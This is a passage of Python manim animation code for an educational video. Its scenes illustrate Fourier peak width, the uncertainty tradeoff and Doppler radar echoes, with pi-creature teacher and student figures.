self.add(self.circle_plane)
self.add(self.frequency_axes)
self.time_graph = self.graph = self.get_time_graph(width = 2)
self.add(self.time_graph)
self.force_skipping()
self.wrap_signal_around_circle()
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.fourier_graph = fourier_graph
self.add(fourier_graph)
self.change_frequency(5)
self.revert_to_original_skipping_status()
def extend_for_long_time(self):
short_time_graph = self.time_graph
long_time_graph = self.get_time_graph(
width = 10,
num_graph_points = 500,
)
long_time_graph.set_stroke(width = 2)
new_freq = 5.1
long_pol_graph = self.get_polarized_mobject(
long_time_graph,
freq = new_freq
)
fourier_graph = self.fourier_graph
self.change_frequency(new_freq)
self.play(
FadeOut(self.graph),
FadeOut(self.graph.polarized_mobject),
FadeOut(fourier_graph)
)
self.play(
ShowCreation(long_time_graph, rate_func=linear),
ShowCreation(long_pol_graph, rate_func=linear),
run_time = 5
)
self.wait()
self.time_graph = self.graph = long_time_graph
def note_sharp_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.time_graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 5.1)
def very_short_signal(self):
time_graph = self.time_graph
fourier_graph = self.fourier_graph
short_time_graph = self.get_time_graph(width = 0.6)
new_freq = 5.1
short_pol_graph = self.get_polarized_mobject(
short_time_graph,
freq = new_freq
)
self.play(
FadeOut(fourier_graph),
FadeOut(time_graph),
FadeOut(time_graph.polarized_mobject),
)
self.play(
ShowCreation(short_time_graph),
ShowCreation(short_time_graph.polarized_mobject),
)
self.graph = self.time_graph = short_time_graph
self.change_frequency(6.66, run_time = 5)
def note_wide_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 6.66)
###
def note_fourier_peak(self, fourier_graph, freq1, freq2):
fourier_graph = self.fourier_graph
dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)
self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
self.generate_fourier_dot_transform(fourier_graph)
dot = self.fourier_graph_dot
arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)
arrow.next_to(dot, UP, buff = SMALL_BUFF)
self.play(ShowCreation(fourier_graph))
self.change_frequency(freq1,
added_anims = [
MaintainPositionRelativeTo(arrow, dot),
UpdateFromAlphaFunc(
arrow,
lambda m, a : m.set_fill(opacity = a)
),
],
run_time = 3,
)
self.wait()
self.change_frequency(freq2,
added_anims = [
MaintainPositionRelativeTo(arrow, dot)
],
run_time = 3
)
self.wait()
self.play(*list(map(FadeOut, [
dot, arrow, self.center_of_mass_dot
])))
#This is not great...
for attr in "center_of_mass_dot", "fourier_graph_dot":
self.__dict__.pop(attr)
def get_fourier_graph_dots(self, fourier_graph, *freqs):
axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)
dots = VGroup()
for freq in freqs:
point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)
dot = Dot(point)
dot.scale(0.5)
dots.add(dot)
vect = point - axis_point
vect *= 1.3/get_norm(vect)
arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)
arrow.set_color(YELLOW)
arrow.shift(point)
dot.arrow = arrow
return dots
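# A rough numerical sketch (hypothetical, not called by the scenes) of the
# point LongAndShortSignalsInWindingMachine makes: the Fourier peak of a
# windowed cosine narrows as the window, i.e. the signal duration, grows.
def _demo_peak_width(freq=5.0, window=2.0, n=4096):
    import numpy as np
    t = np.linspace(0, 20, n, endpoint=False)
    signal = np.where(t < window, np.cos(2 * np.pi * freq * t), 0.0)
    spectrum = np.abs(np.fft.rfft(signal))
    freqs = np.fft.rfftfreq(n, d=t[1] - t[0])
    # The main lobe around freq has width on the order of 1/window.
    return freqs, spectrum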
class FocusRectangleInsert(FourierRecapScene):
CONFIG = {
"target_width" : 0.5
}
def construct(self):
self.setup_axes()
self.clear()
point = self.frequency_axes.coords_to_point(5, 0.25)
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect.set_stroke(YELLOW, 2)
self.add(rect)
self.wait()
self.play(
rect.stretch_to_fit_width, self.target_width,
rect.stretch_to_fit_height, 1.5,
rect.move_to, point,
run_time = 2
)
self.wait(3)
class BroadPeakFocusRectangleInsert(FocusRectangleInsert):
CONFIG = {
"target_width" : 1.5,
}
class CleanerFourierTradeoff(FourierTradeoff):
CONFIG = {
"show_text" : False,
"complex_to_real_func" : lambda z : z.real,
"widths" : [0.02, 6, 1],
}
class MentionDopplerRadar(TeacherStudentsScene):
def construct(self):
words = TextMobject("Doppler Radar")
words.next_to(self.teacher, UP)
words.save_state()
words.shift(DOWN).fade(1)
dish = RadarDish()
dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)
plane = Plane()
plane.to_edge(RIGHT)
plane.align_to(dish)
always_shift(plane, LEFT, 1)
plane.flip()
pulse = RadarPulse(dish, plane)
look_at_anims = [
Mobject.add_updater(
pi, lambda pi : pi.look_at(pulse.mobject)
)
for pi in self.get_pi_creatures()
]
self.add(dish, plane, pulse, *look_at_anims)
self.play(
self.teacher.change, "hooray",
words.restore
)
self.change_student_modes("pondering", "erm", "sassy")
self.wait(2)
self.play(
self.teacher.change, "happy",
self.get_student_changes(*["thinking"]*3)
)
self.wait()
dish.set_stroke(width = 0)
self.play(UpdateFromAlphaFunc(
VGroup(plane, dish),
lambda m, a : m.set_fill(opacity = 1 - a)
))
class IntroduceDopplerRadar(Scene):
CONFIG = {
"frequency_spread_factor" : 100,
}
def construct(self):
self.setup_axes()
self.measure_distance_with_time()
self.show_frequency_shift()
self.show_frequency_shift_in_fourier()
def setup_axes(self):
self.dish = RadarDish()
self.dish.to_corner(UP+LEFT)
axes = Axes(
x_min = 0,
x_max = 10,
y_min = -1.5,
y_max = 1.5
)
axes.move_to(DOWN)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.time_label = time_label
axes.add(time_label)
self.axes = axes
self.add(self.dish)
self.add(axes)
def measure_distance_with_time(self):
dish = self.dish
axes = self.axes
distance = 5
time_diff = 5
speed = (2*distance)/time_diff
randy = Randolph().flip()
randy.match_height(dish)
randy.move_to(dish.get_right(), LEFT)
randy.shift(distance*RIGHT)
pulse_graph, echo_graph, sum_graph = \
self.get_pulse_and_echo_graphs(
self.get_single_pulse_graph,
(1,), (1+time_diff,)
)
words = ["Original signal", "Echo"]
for graph, word in zip([pulse_graph, echo_graph], words):
arrow = Vector(DOWN)
arrow.next_to(graph.peak_point, UP, SMALL_BUFF)
arrow.match_color(graph)
graph.arrow = arrow
label = TextMobject(word)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(graph)
graph.label = label
double_arrow = DoubleArrow(
pulse_graph.peak_point,
echo_graph.peak_point,
color = WHITE
)
distance_text = TextMobject("$2 \\times$ distance/(signal speed)")
distance_text.set_width(0.9*double_arrow.get_width())
distance_text.next_to(double_arrow, UP, SMALL_BUFF)
#v_line anim?
pulse = RadarPulseSingleton(
dish, randy,
speed = 0.97*speed, #Just needs slightly better alignment
)
graph_draw = turn_animation_into_updater(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 0.97*axes.x_max
)
)
randy_look_at = Mobject.add_updater(
randy, lambda pi : pi.look_at(pulse.mobject)
)
axes_anim = ContinualAnimation(axes)
self.add(randy_look_at, axes_anim, graph_draw)
self.wait(0.5)
self.add(pulse)
self.play(
Write(pulse_graph.label),
GrowArrow(pulse_graph.arrow),
run_time = 1,
)
self.play(randy.change, "pondering")
self.wait(time_diff - 2)
self.play(
Write(echo_graph.label),
GrowArrow(echo_graph.arrow),
run_time = 1
)
self.wait()
self.play(
GrowFromCenter(double_arrow),
FadeIn(distance_text)
)
self.wait()
self.remove(graph_draw, pulse, randy_look_at, axes_anim)
self.add(axes)
self.play(LaggedStartMap(FadeOut, VGroup(
sum_graph, randy,
pulse_graph.arrow, pulse_graph.label,
echo_graph.arrow, echo_graph.label,
double_arrow, distance_text
)))
def show_frequency_shift(self):
axes = self.axes
dish = self.dish
plane = Plane()
plane.flip()
plane.move_to(dish)
plane.to_edge(RIGHT)
time_diff = 6
pulse_graph, echo_graph, sum_graph = graphs = \
self.get_pulse_and_echo_graphs(
self.get_frequency_pulse_graph,
(1,25), (1+time_diff,50)
)
for graph in graphs:
graph.set_stroke(width = 3)
signal_graph = self.get_frequency_pulse_graph(1)
pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)
pulse_brace.move_to(axes.coords_to_point(1, 1.2))
echo_brace = pulse_brace.copy()
echo_brace.stretch(0.6, 0)
echo_brace.move_to(axes.coords_to_point(7, 1.2))
pulse_text = pulse_brace.get_text("Original signal")
pulse_text.add_background_rectangle()
echo_text = echo_brace.get_text("Echo")
echo_subtext = TextMobject("(Higher frequency)")
echo_subtext.next_to(echo_text, RIGHT)
echo_subtext.match_color(echo_graph)
graph_draw = turn_animation_into_updater(
ShowCreation(sum_graph, run_time = 8, rate_func=linear)
)
pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)
always_shift(plane, LEFT, 1.5)
self.add(graph_draw, pulse, plane)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = a)
))
self.play(
GrowFromCenter(pulse_brace),
FadeIn(pulse_text),
)
self.wait(3)
self.play(
GrowFromCenter(echo_brace),
GrowFromCenter(echo_text),
)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = 1-a)
))
#Only for when -s is run
graph_draw.update(10)
self.wait(0.1)
self.play(Write(echo_subtext, run_time = 1))
self.wait()
self.remove(graph_draw, pulse, plane)
pulse_graph.set_stroke(width = 0)
echo_graph.set_stroke(width = 0)
self.time_graph_group = VGroup(
axes, pulse_brace, pulse_text,
echo_brace, echo_text, echo_subtext,
pulse_graph, echo_graph, sum_graph,
)
self.set_variables_as_attrs(*self.time_graph_group)
def show_frequency_shift_in_fourier(self):
sum_graph = self.sum_graph
pulse_graph = self.pulse_graph
pulse_label = VGroup(self.pulse_brace, self.pulse_text)
echo_graph = self.echo_graph
echo_label = VGroup(
self.echo_brace, self.echo_text, self.echo_subtext
)
#Setup all fourier graph stuff
f_max = 0.02
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {"unit_size" : 0.5},
y_min = -f_max, y_max = f_max,
y_axis_config = {
"unit_size" : 50,
"tick_frequency" : 0.01,
},
)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP,
)
frequency_label.to_edge(RIGHT)
frequency_axes.add(frequency_label)
for graph in pulse_graph, echo_graph, sum_graph:
graph.fourier_transform = get_fourier_graph(
frequency_axes, graph.underlying_function,
frequency_axes.x_min, 25,
complex_to_real_func = abs,
)
#Braces labeling F.T.
original_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(7, 0.9*f_max),
frequency_axes.coords_to_point(9, 0.9*f_max),
),
UP,
).set_color(BLUE)
echo_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(14, 0.4*f_max),
frequency_axes.coords_to_point(18, 0.4*f_max),
),
UP,
).set_color(YELLOW)
# braces = [original_fourier_brace, echo_fourier_brace]
# words = ["original signal", "echo"]
# for brace, word in zip(braces, words):
# brace.add(brace.get_text("F.T. of \\\\ %s"%word))
fourier_label = TexMobject("||\\text{Fourier transform}||")
# fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)
fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)
fourier_label.shift_onto_screen()
fourier_label.set_color(RED)
#v_lines
v_line = DashedLine(
frequency_axes.coords_to_point(8, 0),
frequency_axes.coords_to_point(8, 1.2*f_max),
color = YELLOW,
dash_length = 0.025,
)
v_line_pair = VGroup(*[
v_line.copy().shift(u*0.6*RIGHT)
for u in (-1, 1)
])
v_line = VGroup(v_line)
double_arrow = DoubleArrow(
frequency_axes.coords_to_point(8, 0.007),
frequency_axes.coords_to_point(16, 0.007),
buff = 0,
color = WHITE
)
self.play(
self.time_graph_group.to_edge, UP,
ApplyMethod(
self.dish.shift, 2*UP,
remover = True
),
FadeIn(frequency_axes)
)
self.wait()
self.play(
FadeOut(sum_graph),
FadeOut(echo_label),
pulse_graph.set_stroke, {"width" : 3},
)
self.play(
ReplacementTransform(
pulse_label[0].copy(),
original_fourier_brace
),
ShowCreation(pulse_graph.fourier_transform)
)
self.play(Write(fourier_label))
self.wait()
self.play(ShowCreation(v_line))
self.wait()
self.play(ReplacementTransform(v_line, v_line_pair))
self.wait()
self.play(FadeOut(v_line_pair))
self.wait()
self.play(
FadeOut(pulse_graph),
FadeIn(sum_graph),
ReplacementTransform(
pulse_graph.fourier_transform,
sum_graph.fourier_transform
)
)
self.play(FadeIn(echo_label))
self.play(ReplacementTransform(
echo_label[0].copy(),
echo_fourier_brace,
))
self.wait(2)
self.play(GrowFromCenter(double_arrow))
self.wait()
###
def get_graph(self, func, **kwargs):
graph = self.axes.get_graph(func, **kwargs)
graph.peak_point = self.get_peak_point(graph)
return graph
def get_single_pulse_graph(self, x, **kwargs):
return self.get_graph(self.get_single_pulse_function(x), **kwargs)
def get_single_pulse_function(self, x):
return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)
def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):
return self.get_graph(
self.get_frequency_pulse_function(x, freq),
num_graph_points = 700,
**kwargs
)
def get_frequency_pulse_function(self, x, freq):
factor = self.frequency_spread_factor
return lambda t : op.mul(
2*np.cos(2*freq*(t-x)),
min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)
)
def get_peak_point(self, graph):
anchors = graph.get_anchors()
return anchors[np.argmax([p[1] for p in anchors])]
def get_pulse_and_echo_graphs(self, func, args1, args2):
pulse_graph = func(*args1, color = BLUE)
echo_graph = func(*args2, color = YELLOW)
sum_graph = self.axes.get_graph(
lambda x : sum([
pulse_graph.underlying_function(x),
echo_graph.underlying_function(x),
]),
num_graph_points = echo_graph.get_num_curves(),
color = WHITE
)
sum_graph.background_image_file = "blue_yellow_gradient"
return pulse_graph, echo_graph, sum_graph
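# A one-line sketch (hypothetical helper) of the timing relation animated in
# measure_distance_with_time: the pulse covers the distance twice before the
# echo returns, so distance = signal_speed * time_diff / 2.
def _demo_echo_distance(time_diff=5.0, signal_speed=2.0):
    return signal_speed * time_diff / 2.0  # 5.0 here, matching distance = 5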
class DopplerFormulaInsert(Scene):
def construct(self):
formula = TexMobject(
"f_{\\text{echo}", "=",
"\\left(1 + \\frac{v}{c}\\right)",
"f_{\\text{pulse}}"
)
formula[0].set_color(BLUE)
formula[3].set_color(YELLOW)
randy = Randolph(color = BLUE_C)
formula.scale(1.5)
formula.next_to(randy, UP+LEFT)
formula.shift_onto_screen()
self.add(randy)
self.play(
LaggedStartMap(FadeIn, formula),
randy.change, "pondering", randy.get_bottom(),
)
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
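# A quick numeric sketch (hypothetical values) of the first-order Doppler
# formula shown above: an approaching target at speed v scales the echo
# frequency by (1 + v/c).
def _demo_doppler_shift(f_pulse=1.0e9, v=250.0, c=3.0e8):
    return (1 + v / c) * f_pulse  # ~1.0000008e9 Hz for a 250 m/s plane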
class MentionPRFNuance(TeacherStudentsScene):
def construct(self):
title = TextMobject(
"Speed of light", "$\\gg$", "Speed of a plane"
)
title.to_edge(UP)
self.add(title)
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = 0, y_max = 2,
)
axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)
frequency_label = TextMobject("Frequency")
frequency_label.scale(0.7)
frequency_label.next_to(axes.x_axis.get_right(), UP)
axes.add(frequency_label)
self.add(axes)
pulse_x, shift_x = 4, 6
pulse_graph = self.get_spike_graph(pulse_x)
shift_graph = self.get_spike_graph(shift_x)
shift_graph.set_stroke(YELLOW, 2)
peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)
self.add(pulse_graph)
brace = Brace(peak_points, UP, buff = SMALL_BUFF)
displayed_doppler_shift = TextMobject("How I'm showing the \\\\", "Doppler shift")
actual_doppler_shift = TextMobject("Actual\\\\", "Doppler shift")
doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)
doppler_shift_words.set_color(YELLOW)
doppler_shift_words.scale(0.75)
displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)
actual_doppler_shift.move_to(pulse_graph.peak_point)
actual_doppler_shift.align_to(displayed_doppler_shift)
self.play(
Animation(pulse_graph),
self.teacher.change, "raise_right_hand",
run_time = 1
)
self.play(
ShowCreation(shift_graph),
FadeIn(brace),
Write(displayed_doppler_shift, run_time = 1),
self.get_student_changes(*3*["sassy"]),
)
self.play(
UpdateFromAlphaFunc(
shift_graph,
lambda g, a : Transform(
g, self.get_spike_graph(
interpolate(shift_x, pulse_x+0.01, a),
).match_style(shift_graph)
).update(1),
),
UpdateFromFunc(
brace,
lambda b : b.match_width(
peak_points, stretch = True
).next_to(peak_points, UP, SMALL_BUFF)
),
Transform(
displayed_doppler_shift, actual_doppler_shift,
rate_func = squish_rate_func(smooth, 0.3, 0.6)
),
run_time = 3
)
self.wait(2)
everything = VGroup(
title,
axes, pulse_graph, shift_graph,
brace, displayed_doppler_shift
)
rect = SurroundingRectangle(everything, color = WHITE)
everything.add(rect)
self.teacher_says(
"I'll ignore certain \\\\ nuances for now.",
target_mode = "shruggie",
added_anims = [
everything.scale, 0.4,
everything.to_corner, UP+LEFT,
UpdateFromAlphaFunc(
rect, lambda m, a : m.set_stroke(width = 2*a)
)
],
)
self.change_student_modes(*3*["hesitant"])
self.wait(2)
def get_spike_graph(self, x, color = RED, **kwargs):
graph = self.axes.get_graph(
lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),
color = color,
**kwargs
)
graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))
graph.add(graph.peak_point)
return graph
class TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):
def construct(self):
x = 7
freq = 25
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -2, y_max = 2,
)
axes.center()
title = TextMobject("Echo signal")
title.next_to(axes.y_axis, UP)
axes.add(title)
axes.to_edge(UP)
graph = self.get_frequency_pulse_graph(x = x, freq = freq)
graph.background_image_file = "blue_yellow_gradient"
arrow = Arrow(
axes.coords_to_point(0, -1.5),
axes.coords_to_point(x, -1.5),
color = WHITE,
buff = SMALL_BUFF,
)
time = TextMobject("Time")
time.next_to(arrow, DOWN, SMALL_BUFF)
delta_x = 0.7
brace = Brace(
Line(
axes.coords_to_point(x-delta_x, 1),
axes.coords_to_point(x+delta_x, 1)
),
UP
)
frequency = TextMobject("Frequency")
frequency.set_color(YELLOW)
frequency.next_to(brace, UP, SMALL_BUFF)
time_updown_arrow = TexMobject("\\Updownarrow")
time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)
freq_updown_arrow = time_updown_arrow.copy()
freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)
distance = TextMobject("Distance")
distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)
velocity = TextMobject("Velocity")
velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)
VGroup(freq_updown_arrow, velocity).match_style(frequency)
self.add(axes)
self.play(ShowCreation(graph))
self.play(
GrowArrow(arrow),
LaggedStartMap(FadeIn, time, run_time = 1)
)
self.play(
GrowFromCenter(brace),
LaggedStartMap(FadeIn, frequency, run_time = 1)
)
self.wait()
self.play(
GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),
ReplacementTransform(
time.copy().fade(1),
distance
)
)
self.play(
GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),
ReplacementTransform(
frequency.copy().fade(1),
velocity
)
)
self.wait()
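# A small sketch (hypothetical helper) tying the scene's two readings
# together: the echo's delay encodes distance, and its frequency shift
# encodes velocity via f_echo = (1 + v/c) * f_pulse.
def _demo_position_and_velocity(delay, f_echo, f_pulse, c=3.0e8):
    distance = c * delay / 2.0
    velocity = c * (f_echo / f_pulse - 1.0)
    return distance, velocity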
class RadarOperatorUncertainty(Scene):
def construct(self):
dish = RadarDish()
dish.scale(3)
dish.move_to(4*RIGHT + 2*DOWN)
dish_words = TextMobject("3b1b industrial \\\\ enterprises")
dish_words.scale(0.25)
dish_words.set_stroke(BLACK, 0.5)
dish_words.set_color(BLACK)
dish_words.move_to(dish, DOWN)
dish_words.shift(SMALL_BUFF*(UP+2*LEFT))
dish.add(dish_words)
randy = Randolph()
randy.next_to(dish, LEFT, aligned_edge = DOWN)
bubble = randy.get_bubble(
width = 7,
height = 4,
)
echo_object = Square()
echo_object.move_to(dish)
echo_object.shift(FRAME_X_RADIUS*RIGHT)
pulse = RadarPulse(dish, echo_object, speed = 6)
plane = Plane().scale(0.5)
plane.move_to(bubble.get_bubble_center()+LEFT)
plane_cloud = ProbabalisticMobjectCloud(
plane,
fill_opacity = 0.3,
n_copies = 10,
)
plane_gdw = plane_cloud.gaussian_distribution_wrapper
vector_cloud = ProbabalisticVectorCloud(
center_func = plane_gdw.get_center,
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.scale(0.05)
vector_gdw.move_to(plane_gdw)
vector_gdw.shift(2*RIGHT)
self.add(randy, dish, bubble, plane_cloud, pulse)
self.play(randy.change, "confused")
self.wait(3)
self.add(vector_cloud)
for i in range(3):
for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):
pulse.internal_time = 0
pulse.frequency = freq
self.play(
randy.change, "pondering", plane,
plane_gdw.scale, plane_factor,
vector_gdw.scale, vector_factor,
)
self.wait(2)
class AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):
CONFIG = {
"object_x_coords" : [7, 4, 6, 9, 8],
"frequency_spread_factor" : 200,
"n_pulse_singletons" : 16,
"pulse_frequency" : 0.025,
}
def construct(self):
self.setup_axes()
self.setup_objects()
self.send_long_pulse_single_echo()
self.introduce_multiple_objects()
self.use_short_pulse()
self.fourier_transform_of_one_pulse()
self.show_echos_of_moving_objects()
self.overlapping_frequencies_of_various_objects()
self.echos_of_long_pure_signal_in_frequency_space()
self.concentrated_fourier_requires_long_time()
def setup_axes(self):
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5,
)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
axes.center()
axes.shift(DOWN)
self.add(axes)
dish = self.dish = RadarDish()
dish.move_to(axes, LEFT)
dish.to_edge(UP, buff = LARGE_BUFF)
self.add(dish)
def setup_objects(self):
objects = self.objects = VGroup(
Plane().flip(),
SVGMobject(
file_name = "blimp",
color = BLUE_C,
height = 0.5,
),
SVGMobject(
file_name = "biplane",
color = RED_D,
height = 0.5,
),
SVGMobject(
file_name = "helicopter",
color = LIGHT_GREY,
height = 0.5,
).rotate(-TAU/24),
FalconHeavy(),
)
y_shifts = [0.25, 0, 0.5, 0.25, -0.5]
for x, y, obj in zip(self.object_x_coords, y_shifts, objects):
obj.move_to(self.axes.coords_to_point(x, 0))
obj.align_to(self.dish)
obj.shift(y*UP)
self.object_velocities = [
0.7*LEFT,
0.1*RIGHT,
0.4*LEFT,
0.4*RIGHT,
0.5*UP,
]
def send_long_pulse_single_echo(self):
x = self.object_x_coords[0]
plane = self.objects[0]
self.add(plane)
randy = self.pi_creature
self.remove(randy)
pulse_graph = self.get_frequency_pulse_graph(x)
pulse_graph.background_image_file = "blue_yellow_gradient"
pulse = self.get_pulse(self.dish, plane)
brace = Brace(
Line(
self.axes.coords_to_point(x-1, 1),
self.axes.coords_to_point(x+1, 1),
), UP
)
words = brace.get_text("Spread over time")
self.add(pulse)
self.wait()
squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)
self.play(
ShowCreation(pulse_graph, rate_func=linear),
GrowFromCenter(brace, rate_func = squished_rate_func),
Write(words, rate_func = squished_rate_func),
run_time = 3,
)
self.remove(pulse)
self.play(FadeIn(randy))
self.play(PiCreatureBubbleIntroduction(
randy, "Who cares?",
bubble_class = ThoughtBubble,
bubble_kwargs = {
"direction" : LEFT,
"width" : 2,
"height": 1.5,
},
target_mode = "maybe",
look_at_arg = brace,
))
self.play(Blink(randy))
self.play(LaggedStartMap(
FadeOut, VGroup(
randy.bubble, randy.bubble.content,
brace, words,
)
))
self.curr_graph = pulse_graph
def introduce_multiple_objects(self):
objects = self.objects
x_coords = self.object_x_coords
curr_graph = self.curr_graph
randy = self.pi_creature
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
graphs.set_color_by_gradient(BLUE, YELLOW)
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
noise_function = lambda t : np.sum([
0.5*np.sin(f*t)/f
for f in (2, 3, 5, 7, 11, 13)
])
noisy_graph = self.axes.get_graph(
lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),
num_graph_points = 1000
)
for graph in sum_graph, noisy_graph:
graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(
LaggedStartMap(GrowFromCenter, objects[1:]),
FadeOut(curr_graph),
randy.change, "pondering"
)
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "confused"
)
self.remove(*pulses)
self.play(randy.change, "pondering")
self.play(Transform(
sum_graph, noisy_graph,
rate_func = lambda t : wiggle(t, 4),
run_time = 3
))
self.wait(2)
self.curr_graph = sum_graph
def use_short_pulse(self):
curr_graph = self.curr_graph
objects = self.objects
x_coords = self.object_x_coords
randy = self.pi_creature
self.frequency_spread_factor = 10
self.n_pulse_singletons = 4
self.pulse_frequency = 0.015
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
sum_graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(FadeOut(curr_graph))
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "happy"
)
self.wait()
self.curr_graph = sum_graph
self.first_echo_graph = graphs[0]
self.first_echo_graph.set_color(YELLOW)
def fourier_transform_of_one_pulse(self):
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {
"unit_size" : 0.5,
"tick_frequency" : 2,
},
y_min = -.01, y_max = .01,
y_axis_config = {
"unit_size" : 110,
"tick_frequency" : 0.006
}
)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(frequency_label)
first_echo_graph = self.first_echo_graph
self.play(
ApplyMethod(
VGroup(self.axes, first_echo_graph).to_edge, UP,
{"buff" : SMALL_BUFF},
rate_func = squish_rate_func(smooth, 0.5, 1)
),
LaggedStartMap(FadeOut, self.objects),
LaggedStartMap(FadeOut, VGroup(
self.curr_graph, self.dish, self.pi_creature
)),
run_time = 2
)
#
frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)
fourier_graph = get_fourier_graph(
frequency_axes, first_echo_graph.underlying_function,
t_min = 0, t_max = 25,
complex_to_real_func = np.abs,
)
fourier_graph.save_state()
fourier_graph.move_to(first_echo_graph)
h_vect = 4*RIGHT
fourier_graph.shift(h_vect)
fourier_graph.fade(1)
f = 8
v_line = DashedLine(
frequency_axes.coords_to_point(f, 0),
frequency_axes.coords_to_point(f, frequency_axes.y_max),
)
v_lines = VGroup(
v_line.copy().shift(2*LEFT),
v_line.copy().shift(2*RIGHT),
)
rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)
rect.replace(v_lines, stretch = True)
rect.save_state()
rect.stretch(0, 0)
self.play(Write(frequency_axes, run_time = 1))
self.play(
ApplyFunction(
lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),
first_echo_graph.copy(),
remover = True,
),
fourier_graph.restore
)
self.wait()
self.play(ShowCreation(v_line))
self.play(
ReplacementTransform(VGroup(v_line), v_lines),
rect.restore
)
self.wait()
self.play(FadeOut(v_lines), FadeOut(rect))
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
def show_echos_of_moving_objects(self):
objects = self.objects
objects.save_state()
object_velocities = self.object_velocities
movements = self.object_movements = [
always_shift(
obj,
direction = v/get_norm(v),
rate = get_norm(v)
)
for v, obj in zip(object_velocities, objects)
]
pulses = self.get_pulses()
continual_anims = pulses+movements
self.play(
FadeOut(self.axes),
FadeOut(self.first_echo_graph),
LaggedStartMap(FadeIn, objects),
FadeIn(self.dish)
)
self.add(*continual_anims)
self.wait(4)
self.play(*[
UpdateFromAlphaFunc(
obj,
lambda m, a : m.set_fill(opacity = 1-a),
)
for obj in objects
])
self.remove(*continual_anims)
self.wait()
def overlapping_frequencies_of_various_objects(self):
frequency_axes = self.frequency_axes
fourier_graph = self.fourier_graph
shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)
color = fourier_graph.get_color()
shifted_graphs.set_color_by_gradient(
average_color(color, WHITE),
color,
average_color(color, BLACK),
)
sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)
sum_graph.match_style(fourier_graph)
shifted_graphs.save_state()
self.play(ReplacementTransform(
VGroup(fourier_graph), shifted_graphs,
lag_ratio = 0.5,
run_time = 2
))
self.wait()
self.play(
shifted_graphs.arrange, DOWN,
shifted_graphs.move_to, fourier_graph, DOWN,
)
